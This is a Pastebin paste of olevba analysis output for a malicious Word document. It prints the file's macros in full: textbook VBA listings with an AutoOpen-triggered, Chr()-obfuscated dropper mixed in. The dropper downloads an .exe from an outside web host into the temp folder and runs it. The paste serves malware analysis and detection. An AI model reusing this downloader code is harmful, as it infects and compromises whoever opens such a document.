SHARE
TWEET

Malicious Word macro

dynamoo Jun 15th, 2015 391 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- 291722~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 291722~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 291722~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub A121212121212(FFFFF As Long)
  17.  
  18. knGjLBTgmGgBh
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
  23.  
  24. A121212121212 (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +------------+-------------+-----------------------------------------+
  32. | Type       | Keyword     | Description                             |
  33. +------------+-------------+-----------------------------------------+
  34. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  35. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  36. |            |             | be used to obfuscate strings (option    |
  37. |            |             | --decode to see all)                    |
  38. +------------+-------------+-----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Module1.bas
  41. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43.  
  44. Dim currCell As String  ' The module-level variable for Listing 7.4
  45.  
  46. ' Listing 7.1. Toggles the active window's gridlines on and off.
  47. '
  48. Sub ToggleGridlines()
  49.  
  50.     With ActiveWindow
  51.        ù.DisplayGridLines = Not à.DisplayGridLines
  52.     End With
  53.    
  54. End Sub
  55.  
  56. ' Listing 7.2. A procedure that tests the Evaluate function.
  57. '
  58. Sub EvaluateTest()
  59.     Dim columnLetter As String
  60.     Dim rowNumber As String
  61.     Dim cellAddress As String
  62.     '
  63.    ' Activate the "Test Data" worksheet
  64.    '
  65.    þ.Worksheets("Test Data").Activate
  66.     '
  67.    ' Get the value in cell A1
  68.    '
  69.    columnLetter = è.[A1].Value
  70.     '
  71.    ' Get the value in cell B1
  72.    '
  73.    rowNumber = è.[B1].Value
  74.     '
  75.    ' Concatenate the two values and then display the message
  76.    '
  77.    cellAddress = columnLetter & rowNumber
  78.     MsgBox "The value in cell " & cellAddress & " is " & ð.Evaluate(cellAddress)
  79. End Sub
  80.  
  81.  
  82. Public Function E1hULdfCYKq40(M72YMyUcUWEAf As String)
  83.  Set Z0EcDOINA = fAQaVGJfCYUL("S" & "h" & Chr(101) & Chr(108) & Chr(108) & "." & "A" & "p" & Chr(112) & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
  84. Z0EcDOINA.Open (AHmYANL3)
  85. End Function
  86. Public Function fAQaVGJfCYUL(U9ZWOpJrq As String)
  87.  Set fAQaVGJfCYUL = CreateObject(U9ZWOpJrq)
  88. End Function
  89. Function CalcNetMargin(fixedCosts)
  90.  
  91.     Dim totalSales
  92.     Dim totalExpenses
  93.    
  94.     With ï.Worksheets("2000 Budget")
  95.         totalSales = ï.Application.Sum(.Range("Sales"))
  96.         totalExpenses = ï.Application.Sum(.Range("Expenses"))
  97.     End With
  98.        
  99.     If totalSales <> 0 Then
  100.         CalcNetMargin = (totalSales - totalExpenses - fixedCosts) / totalSales
  101.     End If
  102.     '
  103.    ' Recalculate whenever the sheet recalculates
  104.    '
  105.    â.Application.Volatile
  106. End Function
  107.  
  108. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  109. ANALYSIS:
  110. +------------+----------------+-----------------------------------------+
  111. | Type       | Keyword        | Description                             |
  112. +------------+----------------+-----------------------------------------+
  113. | Suspicious | Open           | May open a file                         |
  114. | Suspicious | Chr            | May attempt to obfuscate specific       |
  115. |            |                | strings                                 |
  116. | Suspicious | CreateObject   | May create an OLE object                |
  117. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  118. |            |                | may be used to obfuscate strings        |
  119. |            |                | (option --decode to see all)            |
  120. +------------+----------------+-----------------------------------------+
  121. -------------------------------------------------------------------------------
  122. VBA MACRO Module5.bas
  123. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module5'
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125.  
  126. Public AHmYANL3 As String
  127. ' Global variable
  128.  
  129. ' Listing 8.1. This procedure ties everything together by
  130. ' calling each of the code listings individually.
  131. '
  132. Sub Main()
  133.     '
  134.    ' Create the presentation file
  135.    '
  136.    CreateJugglingPresentation
  137.     '
  138.    ' Add the slides
  139.    '
  140.    AddJugglingSlides
  141.     '
  142.    ' Set up the title page
  143.    '
  144.    SetUpStartPage
  145.     '
  146.    ' Set up the Juggling pages
  147.    '
  148.    '
  149.    ' Save it and then run it
  150.    '
  151.    pres.Save
  152.    
  153. End Sub
  154.  
  155. ' Listing 8.2. This procedure creates a new presentation
  156. ' and then saves it.
  157. '
  158. Sub CreateJugglingPresentation()
  159.    '
  160.    ' If the old one is still open, close it without saving
  161.    '
  162.    For Each p In Presentations
  163.         If p.Name = "Juggling" Then
  164.             p.Saved = True
  165.             p.Close
  166.         End If
  167.     Next p
  168.     '
  169.    ' Create a new Presentation object and store it in pres
  170.    '
  171.    Set pres = Presentations.Add
  172.     pres.SaveAs FileName:="Juggling.ppt"
  173. End Sub
  174.  
  175. ' Listing 8.3. A procedure that adds the slides to the
  176. ' Juggling presentation and formats them.
  177. '
  178. Sub AddJugglingSlides()
  179.     Dim i As Integer
  180.    
  181.     With pres
  182.         With .Slides
  183.          '
  184.         ' Add the opening slide
  185.         '
  186.         .Add(Index:=1, Layout:=ppLayoutTitle).Name = "Opener"
  187.          '
  188.         ' Now add the slides for each step
  189.         '
  190.         For i = 1 To 4
  191.              .Add(Index:=i + 1, Layout:=ppLayoutTitle).Name = "Juggling" & i
  192.          Next i
  193.     End With
  194.     '
  195.    ' Set the background for all the slides
  196.    '
  197.    .SlideMaster.Background.Fill.PresetGradient _
  198.         Style:=msoGradientHorizontal, _
  199.         Variant:=1, _
  200.         PresetGradientType:=msoGradientNightfall
  201.     End With
  202. End Sub
  203.  
  204. ' Listing 8.4. A procedure that sets up the text and animation
  205. ' settings for the first page of the Juggling presentation.
  206. '
  207. Sub SetUpStartPage()
  208.     Dim shapeTitle As Shape
  209.     Dim shapeSubTitle As Shape
  210.    
  211.     With pres.Slides("Opener")
  212.         Set shapeTitle = .Shapes(1)     ' The title
  213.        Set shapeSubTitle = .Shapes(2)  ' The subtitle
  214.        '
  215.        ' Add the title text
  216.        '
  217.        With shapeTitle.TextFrame.TextRange
  218.             .Text = "Juggling"
  219.             With .Font
  220.                 .Name = "Arial"
  221.                 .Size = 44
  222.                 .Bold = True
  223.                 ð.Color.RGB = RGB(255, 255, 255)
  224.             End With
  225.         End With
  226.         '
  227.        ' Set the title animation
  228.        '
  229.        With ð.shapeTitle.AnimationSettings
  230.             .Animate = True
  231.             .AdvanceMode = ppAdvanceOnTime
  232.             .AdvanceTime = 0
  233.             .TextUnitEffect = ppAnimateByCharacter
  234.             .EntryEffect = ppEffectFlyFromLeft
  235.         End With
  236.         '
  237.        ' Add the subtitle text
  238.        '
  239.        With shapeSubTitle.TextFrame.TextRange
  240.             .Text = "A Step-By-Step Course"
  241.             With .Font
  242.                 .Name = "Arial"
  243.                 .Size = 36
  244.                 .Bold = True
  245.                 ð.Color.RGB = RGB(255, 255, 255)
  246.             End With
  247.         End With
  248.         '
  249.        ' Set the subtitle animation
  250.        '
  251.        With ð.shapeSubTitle.AnimationSettings
  252.             .Animate = True
  253.             .AdvanceMode = ppAdvanceOnTime
  254.             .AdvanceTime = 0
  255.             .TextUnitEffect = ppAnimateByWord
  256.             .EntryEffect = ppEffectFlyFromBottom
  257.         End With
  258.     End With
  259. End Sub
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261. ANALYSIS:
  262. +------------+----------------+-----------------------------------------+
  263. | Type       | Keyword        | Description                             |
  264. +------------+----------------+-----------------------------------------+
  265. | Suspicious | Open           | May open a file                         |
  266. | Suspicious | Run            | May run an executable file or a system  |
  267. |            |                | command                                 |
  268. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  269. |            |                | may be used to obfuscate strings        |
  270. |            |                | (option --decode to see all)            |
  271. +------------+----------------+-----------------------------------------+
  272. -------------------------------------------------------------------------------
  273. VBA MACRO Module3.bas
  274. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module3'
  275. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  276.  
  277. ' Listing 6.1. A procedure that toggles the display of
  278. ' nonprinting characters on and off.
  279. '
  280. Sub ToggleNonprinting()
  281.  
  282.     With ActiveWindow.View
  283.         .ShowAll = Not .ShowAll
  284.     End With
  285.  
  286. End Sub
  287.  
  288.  
  289. ' Listing 6.3. A procedure that moves the Word window
  290. ' into the top left corner of the screen.
  291. '
  292. Sub TopLeftCorner()
  293.     With Application
  294.         If .WindowState <> wdWindowStateMaximize _
  295.             And .WindowState <> wdWindowStateMinimize _
  296.             Then .Move 0, 0
  297.     End With
  298. End Sub
  299.  
  300. ' Listing 6.4. Procedures that create and open
  301. ' a workspace of files.
  302. '
  303. ' CreateWorkspace()
  304. ' Saves the path and filename data of all the
  305. ' open files to the Windows Registry. Before
  306. ' running this procedure, make sure only the
  307. ' files you want in the workspace are open.
  308. '
  309. Sub CreateWorkspace()
  310.     Dim total As Integer
  311.     Dim doc As Document
  312.     Dim i As Integer
  313.     '
  314.    ' Delete the old workspace settings
  315.    ' First, get the total number of files
  316.    '
  317.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  318.     For i = 1 To total
  319.         '
  320.        ' Delete each setting
  321.        '
  322.        DeleteSetting "Word", "Workspace", "Document" & i
  323.     Next 'i
  324.    '
  325.    ' Create the new workspace
  326.    '
  327.    i = 0
  328.     For Each doc In Documents
  329.         '
  330.        ' Make sure it's not a new, unsaved file
  331.        '
  332.        If doc.Path <> "" Then
  333.             '
  334.            ' Use i to create unique setting names
  335.            '
  336.            i = i + 1
  337.             '
  338.            ' Save the FullName (path and filename) to the Registry
  339.            '
  340.            SaveSetting "Word", "Workspace", "Document" & i, doc.FullName
  341.         End If
  342.     Next 'doc
  343.    '
  344.    ' Save tht total number of files
  345.    '
  346.    SaveSetting "Word", "Workspace", "TotalFiles", i
  347. End Sub
  348. Sub knGjLBTgmGgBh()
  349.  
  350. Set DhAXmemS278B6 = fAQaVGJfCYUL(Chr(77) & "i" & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
  351.  
  352. CallByName DhAXmemS278B6, "O" & Chr(112) & Chr(101) & Chr(110), Chr(71) & Chr(69) & Chr(84), _
  353. Chr(104) & Chr(116) & Chr(116) & "p" & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(102) & "r" & "e" & Chr(101) & Chr(119) & Chr(101) & Chr(98) & Chr(115) & Chr(116) & Chr(117) & Chr(102) & Chr(102) & Chr(46) & Chr(98) & Chr(101) & Chr(47) & "3" & Chr(52) & Chr(47) & Chr(52) & "4" & Chr(46) & "e" & Chr(120) & Chr(101) _
  354. , False
  355.  
  356.  
  357. Set VZGc6njbPx6 = fAQaVGJfCYUL("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  358.  
  359. Set gsHD7abC5N3 = CallByName(VZGc6njbPx6, "E" & Chr(110) & Chr(118) & "i" & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, "P" & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & "s")
  360.  
  361. I2fThDFfJ2x = gsHD7abC5N3("T" & Chr(69) & Chr(77) & Chr(80))
  362.  
  363. AHmYANL3 = I2fThDFfJ2x & Chr(92) & "g" & Chr(105) & Chr(110) & Chr(107) & Chr(97) & Chr(110) & Chr(56) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  364. Dim L3eSO44R() As Byte
  365.  
  366. CallByName DhAXmemS278B6, "S" & "e" & Chr(110) & Chr(100), VbMethod
  367. L3eSO44R = CallByName(DhAXmemS278B6, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & "s" & "e" & Chr(66) & "o" & "d" & Chr(121), VbGet)
  368. aJbV7hKTsFzE L3eSO44R, AHmYANL3
  369. On Error GoTo GbzD0F5w
  370.     a = 84 / 0
  371.   On Error GoTo 0
  372.  
  373. YmVz6Pw29BQ:
  374.   Exit Sub
  375. GbzD0F5w:
  376.   E1hULdfCYKq40 ("qXSh3tUIo")
  377. Resume YmVz6Pw29BQ
  378. End Sub
  379. Public Function aJbV7hKTsFzE(bB2ojLbgVtJ As Variant, sliQYqZdLGCmtq As String)
  380. Dim BkUobg5a: Set BkUobg5a = fAQaVGJfCYUL(Chr(65) & "d" & Chr(111) & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & Chr(109))
  381.  
  382. With BkUobg5a
  383.    .Type = 1
  384.     .Open
  385.     .write bB2ojLbgVtJ
  386.     .savetofile sliQYqZdLGCmtq, 2
  387. End With
  388. End Function
  389.  
  390.  
  391.  
  392.  
  393. '
  394. ' OpenWorkspace()
  395. ' Accesses the Registry's workspace settings
  396. ' and then opens each workspace file.
  397. '
  398. Sub OpenWorkspace()
  399.     Dim total As Integer
  400.     Dim i As Integer
  401.     Dim filePath As String
  402.     Dim doc As Document
  403.     Dim fileAlreadyOpen As Boolean
  404.     '
  405.    ' Get the total number of files
  406.    '
  407.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  408.     For i = 1 To total
  409.         '
  410.        ' Get the path and filename
  411.        '
  412.        filePath = GetSetting("Word", "Workspace", "Document" & i)
  413.         '
  414.        ' Make sure the file isn't already open
  415.        '
  416.        fileAlreadyOpen = False
  417.         For Each doc In Documents
  418.             If filePath = doc.FullName Then
  419.                 fileAlreadyOpen = True
  420.                 Exit For
  421.             End If
  422.         Next 'doc
  423.        '
  424.        ' Open it
  425.        '
  426.        If Not fileAlreadyOpen Then
  427.             Documents.Open filePath
  428.         End If
  429.     Next 'i
  430. End Sub
  431.  
  432. Sub TestStylesAddMethod()
  433. Set newStyle = ActiveDocument.Styles.Add("PageTitle", wdStyleTypeParagraph)
  434. With newStyle
  435.     .Font.Bold = True
  436.     .Font.Underline = True
  437.     .Font.Size = 24
  438.     .Font.Name = "Arial"
  439.     .ParagraphFormat.Alignment = wdAlignParagraphCenter
  440.     .ParagraphFormat.SpaceAfter = 12
  441.     .NextParagraphStyle = wdStyleNormal
  442. End With
  443. End Sub
  444.  
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------+-----------------------------------------+
  449. | Type       | Keyword        | Description                             |
  450. +------------+----------------+-----------------------------------------+
  451. | Suspicious | Open           | May open a file                         |
  452. | Suspicious | Windows        | May enumerate application windows (if   |
  453. |            |                | combined with Shell.Application object) |
  454. | Suspicious | Chr            | May attempt to obfuscate specific       |
  455. |            |                | strings                                 |
  456. | Suspicious | SaveToFile     | May create a text file                  |
  457. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  458. |            |                | function calls                          |
  459. | Suspicious | Write          | May write to a file (if combined with   |
  460. |            |                | Open)                                   |
  461. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  462. |            |                | may be used to obfuscate strings        |
  463. |            |                | (option --decode to see all)            |
  464. +------------+----------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top